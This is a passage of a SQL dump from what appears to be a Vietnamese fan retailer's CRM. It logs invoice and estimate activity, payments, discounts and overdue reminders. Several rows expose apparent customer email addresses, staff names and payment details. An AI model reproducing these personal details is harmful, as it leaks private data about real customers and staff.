(1259, 'invoice', 216, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4095000.00\";i:1;s:10:\"6300000.00\";}', '16', 'Tuyền Ngọc', '2022-11-08 12:53:42'),
(1260, 'invoice', 216, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6300000.00\";i:1;s:7:\"4095000\";}', '1', 'Ho Gia Phat', '2022-11-08 12:58:56'),
(1261, 'invoice', 216, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '16', 'Tuyền Ngọc', '2022-11-09 09:35:26'),
(1262, 'invoice', 216, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.595.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/218\" target=\"_blank\">#218</a>\";}', '16', 'Tuyền Ngọc', '2022-11-09 09:35:26'),
(1263, 'estimate', 120, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-09 17:05:23'),
(1264, 'invoice', 205, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-09 17:11:48'),
(1265, 'invoice', 205, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"207\";i:1;s:12:\"2.500.000 đ\";}', '1', 'Ho Gia Phat', '2022-11-09 17:11:48'),
(1266, 'invoice', 205, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-09 17:12:20'),
(1267, 'invoice', 176, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-11 21:09:54'),
(1268, 'invoice', 176, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"111.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/219\" target=\"_blank\">#219</a>\";}', '1', 'Ho Gia Phat', '2022-11-11 21:09:54'),
(1269, 'invoice', 170, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-11 21:09:54'),
(1270, 'invoice', 170, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.650.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/220\" target=\"_blank\">#220</a>\";}', '1', 'Ho Gia Phat', '2022-11-11 21:09:54'),
(1271, 'invoice', 145, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-11 21:09:54'),
(1272, 'invoice', 145, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"155.231.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/221\" target=\"_blank\">#221</a>\";}', '1', 'Ho Gia Phat', '2022-11-11 21:09:54'),
(1273, 'estimate', 128, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-13 09:04:06'),
(1274, 'estimate', 128, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Chi phí vận chuyển tới chân công trình\";}', '1', 'Ho Gia Phat', '2022-11-13 09:13:48'),
(1275, 'invoice', 217, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-13 09:13:51'),
(1276, 'estimate', 128, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/217\">INV-208-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-13 09:13:51'),
(1277, 'invoice', 217, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-13 09:14:16'),
(1278, 'invoice', 217, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"30.990.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/222\" target=\"_blank\">#222</a>\";}', '1', 'Ho Gia Phat', '2022-11-13 09:14:16'),
(1279, 'invoice', 217, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-13 09:14:32'),
(1280, 'invoice', 217, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"222\";i:1;s:13:\"30.990.000 đ\";}', '1', 'Ho Gia Phat', '2022-11-13 09:14:32'),
(1281, 'invoice', 217, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-13 09:14:59'),
(1282, 'invoice', 217, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"30.990.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/223\" target=\"_blank\">#223</a>\";}', '1', 'Ho Gia Phat', '2022-11-13 09:14:59'),
(1283, 'invoice', 217, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-14 17:28:43'),
(1284, 'invoice', 217, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"30.990.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/224\" target=\"_blank\">#224</a>\";}', '1', 'Ho Gia Phat', '2022-11-14 17:28:43'),
(1285, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-14 21:01:37'),
(1286, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-14 21:01:41'),
(1287, 'invoice', 144, 'user_sent_overdue_reminder', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-14 21:01:45'),
(1288, 'estimate', 127, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-14 21:51:16'),
(1289, 'estimate', 129, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-11-15 11:16:48'),
(1290, 'estimate', 129, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-15 11:21:45'),
(1291, 'estimate', 129, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:814:\"Bảo Hành Động Cơ: 05 năm cho động cơ, 01 năm cho phụ kiện đi kèm<br />\r\nChất Liệu Cánh: Dark Walbut Wood - Gỗ tự nhiên màu<br />\r\nMàu Sắc Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên)<br />\r\nMàu Sắc Thân Quạt: Matte Black (sơn tĩnh điện màu Đen)<br />\r\nChiều Cao: 35 cm (có thể nối dài theo độ cao trần)<br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China<br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs<br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm<br />\r\nAirflow (M3/Min): 6823 CFM<br />\r\nTốc Độ Quay: 5-6 cấp độ gió<br />\r\nNguồn Điện: 220V/50Hz-60Hz<br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)<br />\r\nCông Suất Động Cơ: 35W (BLDC motor)<br />\r\n\";i:1;s:734:\"Bảo Hành Động Cơ: 05 năm cho động cơ, 01 năm cho phụ kiện đi kèm\r\nChất Liệu Cánh: Dark Walbut Wood - Gỗ tự nhiên màu\r\nMàu Sắc Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên)\r\nMàu Sắc Thân Quạt: Matte Black (sơn tĩnh điện màu Đen)\r\nChiều Cao: 35 cm (có thể nối dài theo độ cao trần)\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China\r\nSải Cánh Quạt: 1m32 ~ 52 inchs\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm\r\nAirflow (M3/Min): 6823 CFM\r\nTốc Độ Quay: 5-6 cấp độ gió\r\nNguồn Điện: 220V/50Hz-60Hz\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)\r\nCông Suất Động Cơ: 35W (BLDC motor)\";}', '1', 'Ho Gia Phat', '2022-11-15 11:21:45'),
(1292, 'invoice', 218, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-15 11:22:53'),
(1293, 'estimate', 129, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/218\">INV-209-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-15 11:22:53'),
(1294, 'invoice', 218, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-11-15 11:23:11'),
(1295, 'invoice', 218, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:33:\"Quạt trần AKMANI không đèn\";}', '1', 'Ho Gia Phat', '2022-11-15 11:27:29'),
(1296, 'invoice', 218, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:46:\"Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-11-15 11:27:29'),
(1297, 'invoice', 218, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:46:\"Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-11-15 11:46:13'),
(1298, 'invoice', 218, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:46:\"Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-11-15 11:46:13'),
(1299, 'invoice', 218, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-15 11:58:49'),
(1300, 'invoice', 218, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.470.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/225\" target=\"_blank\">#225</a>\";}', '1', 'Ho Gia Phat', '2022-11-15 11:58:49'),
(1301, 'estimate', 130, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-11-15 12:12:29'),
(1302, 'invoice', 219, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-11-15 12:12:46'),
(1303, 'estimate', 130, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/219\">INV-210-22</a>\";}', '17', 'Loan Nguyễn', '2022-11-15 12:12:46'),
(1304, 'invoice', 219, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2022-11-15 12:14:52'),
(1305, 'invoice', 219, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.550.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/226\" target=\"_blank\">#226</a>\";}', '17', 'Loan Nguyễn', '2022-11-15 12:14:52'),
(1306, 'invoice', 218, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-16 10:45:56'),
(1307, 'invoice', 218, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"225\";i:1;s:12:\"7.470.000 đ\";}', '1', 'Ho Gia Phat', '2022-11-16 10:45:56');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(1308, 'invoice', 219, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-16 10:46:01'),
(1309, 'invoice', 219, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"226\";i:1;s:12:\"3.550.000 đ\";}', '1', 'Ho Gia Phat', '2022-11-16 10:46:01'),
(1310, 'estimate', 130, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-16 10:46:27'),
(1311, 'estimate', 129, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:33:\"Quạt trần AKMANI không đèn\";}', '1', 'Ho Gia Phat', '2022-11-16 10:47:45'),
(1312, 'estimate', 129, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:59:\"Nhân công lắp đặt quạt trần - Trần Thạch cao\";}', '1', 'Ho Gia Phat', '2022-11-16 10:47:45'),
(1313, 'estimate', 129, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:46:\"Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood\";}', '1', 'Ho Gia Phat', '2022-11-16 10:47:45'),
(1314, 'estimate', 129, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-11-16 10:47:45'),
(1315, 'estimate', 131, 'estimate_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:42:23'),
(1316, 'estimate', 131, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:44:07'),
(1317, 'estimate', 131, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:51:42'),
(1318, 'invoice', 220, 'invoice_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:54:14'),
(1319, 'estimate', 131, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/220\">INV-DRAFT</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:54:14'),
(1320, 'invoice', 220, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:55:57'),
(1321, 'invoice', 220, 'invoice_activity_marked_as_sent', 'a:0:{}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2022-11-16 11:55:57'),
(1322, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-17 06:53:07'),
(1323, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-17 06:53:11'),
(1324, 'invoice', 144, 'user_sent_overdue_reminder', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-11-17 06:53:16'),
(1325, 'estimate', 132, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-17 06:55:30'),
(1326, 'estimate', 132, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:527:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China <br />\r\n\";i:1;s:476:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm  \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '1', 'Ho Gia Phat', '2022-11-17 06:56:17'),
(1327, 'estimate', 132, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Chi phí vận chuyển tới chân công trình\";}', '1', 'Ho Gia Phat', '2022-11-17 06:56:17'),
(1328, 'invoice', 221, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-17 06:56:33'),
(1329, 'estimate', 132, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/221\">INV-212-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-17 06:56:33'),
(1330, 'invoice', 221, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:36:\"Giao hàng miễn phí - Kiên Giang\";}', '1', 'Ho Gia Phat', '2022-11-17 06:58:58'),
(1331, 'invoice', 221, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-11-17 06:59:49'),
(1332, 'estimate', 133, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-17 07:22:18'),
(1333, 'estimate', 133, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:324:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:293:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '1', 'Ho Gia Phat', '2022-11-17 07:22:27'),
(1334, 'estimate', 133, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:323:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm\";i:1;s:327:\"Sải cánh 132cm ( ~ 52inch)\r\nMóc treo: loại ốp sát trần\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '1', 'Ho Gia Phat', '2022-11-17 07:23:30'),
(1335, 'estimate', 133, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Chi phí vận chuyển tới chân công trình\";}', '1', 'Ho Gia Phat', '2022-11-17 07:24:19'),
(1336, 'invoice', 222, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-11-17 07:24:34'),
(1337, 'estimate', 133, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/222\">INV-213-22</a>\";}', '1', 'Ho Gia Phat', '2022-11-17 07:24:34'),
(1338, 'invoice', 222, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-11-17 07:25:01'),
(1339, 'invoice', 144, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-17 08:03:33'),
(1340, 'invoice', 144, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"243.801.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/227\" target=\"_blank\">#227</a>\";}', '1', 'Ho Gia Phat', '2022-11-17 08:03:33'),
(1341, 'estimate', 134, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-11-17 09:30:35'),
(1342, 'estimate', 134, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-11-17 09:32:31'),
(1343, 'estimate', 134, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-11-17 09:32:31'),
(1344, 'estimate', 134, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:71:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)\";}', '17', 'Loan Nguyễn', '2022-11-17 09:42:23'),
(1345, 'estimate', 134, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:71:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)\";}', '17', 'Loan Nguyễn', '2022-11-17 09:42:23'),
(1346, 'invoice', 223, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-11-17 09:42:37'),
(1347, 'estimate', 134, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/223\">INV-214-22</a>\";}', '17', 'Loan Nguyễn', '2022-11-17 09:42:37'),
(1348, 'invoice', 223, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:71:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)\";}', '17', 'Loan Nguyễn', '2022-11-17 09:54:56'),
(1349, 'invoice', 223, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:71:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)\";}', '17', 'Loan Nguyễn', '2022-11-17 09:54:56'),
(1350, 'invoice', 223, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-11-17 09:56:29'),
(1351, 'invoice', 223, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:71:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)\";}', '17', 'Loan Nguyễn', '2022-11-17 09:56:29'),
(1352, 'invoice', 223, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:71:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)\";}', '17', 'Loan Nguyễn', '2022-11-17 09:56:29'),
(1353, 'invoice', 223, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '17', 'Loan Nguyễn', '2022-11-17 09:56:29'),
(1354, 'invoice', 223, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2022-11-17 10:20:45'),
(1355, 'estimate', 135, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2022-11-17 10:53:49'),
(1356, 'invoice', 224, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2022-11-17 10:54:02'),
(1357, 'estimate', 135, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/224\">INV-215-22</a>\";}', '17', 'Loan Nguyễn', '2022-11-17 10:54:02'),
(1358, 'invoice', 224, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '17', 'Loan Nguyễn', '2022-11-17 10:55:15'),
(1359, 'invoice', 224, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:35:\"Quạt trần KATRINA 52 Gray Maple\";}', '1', 'Ho Gia Phat', '2022-11-17 10:59:17'),
(1360, 'invoice', 224, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Chi phí vận chuyển tới chân công trình\";}', '1', 'Ho Gia Phat', '2022-11-17 10:59:17'),
(1361, 'invoice', 221, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-17 10:59:17'),
(1362, 'invoice', 224, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:35:\"Quạt trần KATRINA 52 Gray Maple\";}', '1', 'Ho Gia Phat', '2022-11-17 10:59:35'),
(1363, 'invoice', 219, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:59:\"Nhân công lắp đặt quạt trần - Trần Thạch cao\";}', '1', 'Ho Gia Phat', '2022-11-17 12:01:21'),
(1364, 'invoice', 218, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-11-17 12:01:21'),
(1365, 'invoice', 219, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:59:\"Nhân công lắp đặt quạt trần - Trần Thạch cao\";}', '1', 'Ho Gia Phat', '2022-11-17 12:01:52'),
(1366, 'invoice', 219, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:46:\"Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood\";i:1;s:4:\"1.00\";i:2;s:1:\"3\";}', '1', 'Ho Gia Phat', '2022-11-17 12:01:52'),
(1367, 'invoice', 219, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '1', 'Ho Gia Phat', '2022-11-17 12:01:52'),
(1368, 'invoice', 219, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-17 12:02:25'),
(1369, 'invoice', 219, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.470.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/228\" target=\"_blank\">#228</a>\";}', '1', 'Ho Gia Phat', '2022-11-17 12:02:25'),
(1370, 'invoice', 222, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-17 15:29:25'),
(1371, 'invoice', 222, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.040.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/229\" target=\"_blank\">#229</a>\";}', '1', 'Ho Gia Phat', '2022-11-17 15:29:25'),
(1372, 'invoice', 224, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-11-17 15:30:06'),
(1373, 'invoice', 224, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.400.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/230\" target=\"_blank\">#230</a>\";}', '1', 'Ho Gia Phat', '2022-11-17 15:30:06'),
(1374, 'estimate', 136, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-11-19 11:23:29'),
(1375, 'estimate', 136, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '1', 'Ho Gia Phat', '2022-11-19 11:23:42'),
(1376, 'estimate', 136, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-11-19 11:24:30'),
